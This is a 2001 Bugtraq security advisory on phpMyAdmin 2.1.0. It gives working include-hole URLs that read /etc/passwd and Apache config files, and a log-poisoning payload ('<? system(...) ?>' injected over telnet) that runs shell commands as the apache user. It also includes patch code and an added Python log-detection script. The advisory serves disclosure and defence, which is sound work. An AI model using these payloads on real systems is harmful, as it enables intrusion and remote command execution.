Bugtraq mailing list archives

phpMyAdmin 2.1.0 + world readable (apache) log files enable remote user to run arbitrary PHP Codes as apache user.

From: alias () securityfocus com
Date: 1 Jul 2001 23:42:45 -0000

From: <sl4sh () ifrance com>
MIME-Version: 1.0
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
Date: Sun, 1 Jul 2001 23:43:17 GMT
Message-id: <200107012343.115e () lh00 opsion fr>

Note: sorry for my poor English.

************************************************************************

First of all, I want to ask a question: is it normal that if, in a MySQL query (via PHP), I put "select * from $table" . "_files where ID=1" and I post table="atable #", MySQL considers the new query a valid one (so the final query will be "select * from atable")? It's, in my opinion, a serious hole in MySQL queries... (I use mysql_query() to do this.)

************************************************************************


In this text, I will assume that I have access to the phpMyAdmin of victim.com and that phpMyAdmin is located at http://www.victim.com/phpMyAdmin

* Overview

phpMyAdmin is a useful PHP tool for managing a MySQL database through a web-based interface. phpMyAdmin is widely used by web hosting providers who give access to a MySQL database.
For more information see: http://www.phpwizard.net/projects/phpMyAdmin/

The holes described below were tested on Debian 2.2 and on RedHat 7.1 with phpMyAdmin 2.1.0.



I. The phpMyAdmin 2.1.0 holes

There are two include() holes in phpMyAdmin 2.1.0 - this is the latest version, but the holes may also work on older ones.
These two holes can be reached with something like this:

http://www.victim.com/phpMyAdmin/sql.php?goto=/etc/passwd&btnDrop=No (*)
and
http://www.victim.com/phpMyAdmin/tbl_replace.php?db=test&table=ess&goto=/etc/passwd

Of course, to exploit these holes, the attacker needs to be logged in to the remote phpMyAdmin.

These holes come from a line like this: 'include($goto);' in sql.php and in tbl_replace.php.

With this you could read a lot of files, and execute any PHP code on the remote server.

(*) Note: for btnDrop the value could be in another language (in my configuration, I must put 'Non' instead of 'No').



II. Using world readable (apache) log files to execute our own PHP code

By using world readable log files (here I will use the Apache log files, but you can use other log files such as lastlog (by supplying the right login), the telnet log file, the ftp log file...), you can execute, through the hole described before, the PHP code you want.

First, you read the Apache configuration files to find out where the logs are:

http://www.victim.com/phpMyAdmin/sql.php?goto=/etc/apache/conf/httpd.conf&btnDrop=No
http://www.victim.com/phpMyAdmin/sql.php?goto=/etc/apache/conf/srm.conf&btnDrop=No
http://www.victim.com/phpMyAdmin/sql.php?goto=/etc/apache/conf/access.conf&btnDrop=No

Now, we assume that the logs are in /var/log/httpd/error_log for errors and in /var/log/httpd/access_log for Apache accesses (this should be the default on RedHat 7.1).

We telnet to port 80:
# telnet www.victim.com 80
Trying xxx.xxx.xxx.xxx...
Connected to www.victim.com.
Escape character is '^]'.
get <pre><? system(stripslashes($parameters)); ?></pre>
^]
telnet> quit
Connection closed.
#

Here, after "get", we can put any PHP code we want; Apache writes the request line, PHP tags included, into access_log.

Now we can execute any remote command we want as the apache user by doing:
http://www.victim.com/phpMyAdmin/sql.php?goto=/var/log/httpd/access_log&btnDrop=No&parameters=ls%20-l%20/
(in fact, by sending a unix command in parameters).

Now you're able to do nearly whatever the apache user could do.
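As an added example (not part of the original post), a small Python checker that scans Apache access_log lines for the two request patterns described above: a goto value handed to sql.php or tbl_replace.php that is not a bare phpMyAdmin page name, and a request line carrying a PHP open tag (the log poisoning step), plus the parameters argument used to drive the poisoned include. The sample log lines, IPs, timestamps and the SAFE_GOTO rule are constructed assumptions for this example.

```python
import re
from urllib.parse import unquote, urlsplit, parse_qs

# Constructed Apache access_log lines mirroring the advisory's requests
# (IPs, timestamps and byte counts are made up for this example).
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jul/2001:23:40:01 +0000] "GET /phpMyAdmin/sql.php?goto=/etc/passwd&btnDrop=No HTTP/1.0" 200 1840
10.0.0.5 - - [01/Jul/2001:23:41:12 +0000] "get <pre><? system(stripslashes($parameters)); ?></pre>" 400 0
10.0.0.5 - - [01/Jul/2001:23:42:30 +0000] "GET /phpMyAdmin/sql.php?goto=/var/log/httpd/access_log&btnDrop=No&parameters=ls%20-l%20/ HTTP/1.0" 200 512
10.0.0.9 - - [01/Jul/2001:23:43:00 +0000] "GET /phpMyAdmin/sql.php?goto=tbl_properties.php&db=test HTTP/1.0" 200 3200
"""

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]*\] "([^"]*)" (\d{3}) \S+')
INCLUDE_SCRIPTS = ("sql.php", "tbl_replace.php")  # the two scripts that include($goto)
SAFE_GOTO = re.compile(r'^[A-Za-z0-9_]+\.php$')    # assumption: a legitimate goto is a bare page name

def inspect_request(raw_request):
    """Return a list of (rule, detail) findings for one logged request line."""
    findings = []
    if "<?" in raw_request:  # a PHP open tag written into the log: poisoning attempt
        findings.append(("log_poisoning", raw_request))
    parts = raw_request.split(" ")
    target = parts[1] if len(parts) > 1 else ""
    url = urlsplit(target)
    if url.path.rsplit("/", 1)[-1] in INCLUDE_SCRIPTS:
        params = parse_qs(url.query)
        for goto in params.get("goto", []):
            if not SAFE_GOTO.match(unquote(goto)):  # absolute path, traversal, log file...
                findings.append(("include_traversal", unquote(goto)))
        if "parameters" in params:  # the argument the poisoned log entry passes to system()
            findings.append(("poisoned_log_exec", params["parameters"][0]))
    return findings

def scan_access_log(text):
    """Scan a whole access_log text; returns (lineno, client, rule, detail) tuples."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), 1):
        m = LINE_RE.match(line)
        if not m:
            continue
        for rule, detail in inspect_request(m.group(2)):
            hits.append((lineno, m.group(1), rule, detail))
    return hits

if __name__ == "__main__":
    for hit in scan_access_log(SAMPLE_LOG):
        print(hit)
```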


III. Solutions

The solutions to the phpMyAdmin holes are to put user access control in place, restrict the users who are able to access phpMyAdmin, etc.
The code changes to avoid these holes are:
in sql.php:
  replace:
        if(file_exists($goto))
        {
            include("header.inc.php");
            if(isset($zero_rows) && !empty($zero_rows))
                $message = $zero_rows;
            else
                $message = $strEmptyResultSet;
            include($goto);
        }
        else
        {
            $message = $zero_rows;
            Header("Location: $goto");
        }

  by:
            $message = $zero_rows;
            Header("Location: $goto");

and in tbl_replace.php:
  replace:
    if(file_exists($goto))
    {
        include("header.inc.php");
        $message = $strModifications;
        include($goto);
    }
    else
        Header("Location: $goto");
    exit;

  by:
        Header("Location: $goto");


Of course, phpMyAdmin might not work properly after this correction (not tested).


For the second hole (world readable log files), just set all the log files you can to read-write for root and nothing for others.
Also try not to put something like include($params); in your PHP code (or in other server-side languages like Perl).
Remove authorization for the unix command functions in the PHP configuration.



Slash <slash-rtc () fr st> [RtC]

